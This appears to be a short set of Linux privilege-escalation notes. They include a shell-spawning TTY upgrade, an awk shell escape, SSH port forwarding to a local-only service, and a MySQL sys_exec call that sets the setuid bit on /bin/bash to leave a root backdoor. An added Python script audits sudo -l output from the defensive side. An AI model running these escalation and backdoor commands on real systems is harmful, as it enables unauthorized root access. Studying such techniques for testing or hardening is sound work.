/!\ To get a nice TTY :
python -c 'import pty;pty.spawn("/bin/bash")'
CTRL + Z
stty raw -echo
- Checking sudo :
sudo -l
- Checking netstat :
netstat -laputen
- Checking process :
ps -elf
awk 'BEGIN {system("/bin/sh")}'
A service listens locally on port 1234.
ssh user@remotemachine -L 80:localhost:1234
Now navigate to localhost:80
Binaries that can be exploited : https://gtfobins.github.io
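The same sudo -l check seen from the hardening side: an added example, not part of the original notes, that parses sudo -l output and flags rules granting a shell-capable binary or an unrestricted ALL. The sample output, the function name audit_sudo_rules and the short SHELL_CAPABLE set (limited to interpreters named on this page) are assumptions for illustration.

```python
import os
import re

# Assumption: illustrative set limited to interpreters named on this page;
# a real audit would check against a maintained list such as GTFOBins.
SHELL_CAPABLE = {"awk", "python", "mysql", "bash", "sh"}

# Constructed sample of `sudo -l` output (not from a real host).
SAMPLE = """\
User deploy may run the following commands on web01:
    (root) NOPASSWD: /usr/bin/awk, /usr/bin/systemctl restart nginx
    (backup) /usr/bin/mysql
    (ALL : ALL) ALL
"""

RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<rest>.+)$")
TAGS = re.compile(r"^(?:[A-Z_]+:\s*)+")  # NOPASSWD:, PASSWD:, SETENV:, ...


def audit_sudo_rules(text):
    """Flag sudo rules that effectively hand out a shell as the run-as user."""
    findings = []
    for line in text.splitlines():
        rule = RULE.match(line)
        if not rule:
            continue  # header, Defaults line or blank
        nopasswd = False  # tags apply to every later command on the line
        for cmd in rule.group("rest").split(","):
            cmd = cmd.strip()
            tags = TAGS.match(cmd)
            if tags:
                names = tags.group(0).replace(":", " ").split()
                nopasswd = "NOPASSWD" in names or (nopasswd and "PASSWD" not in names)
                cmd = cmd[tags.end():]
            if not cmd:
                continue
            if cmd == "ALL":
                reason = "unrestricted rule"
            elif os.path.basename(cmd.split()[0]) in SHELL_CAPABLE:
                reason = "binary can spawn a shell"
            else:
                continue
            findings.append({"runas": rule.group("runas").strip(), "command": cmd,
                             "nopasswd": nopasswd, "reason": reason})
    return findings


if __name__ == "__main__":
    for finding in audit_sudo_rules(SAMPLE):
        print(finding)
```

Rules flagged with nopasswd set are the ones to remove or narrow first, since they need no credential at all.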
Execute command : mysql -u [user] -p -e "COMMAND HERE"
Execute command as MySQL process owner : mysql> SELECT sys_exec('chmod u+s /bin/bash');
dir /ah
to display hidden files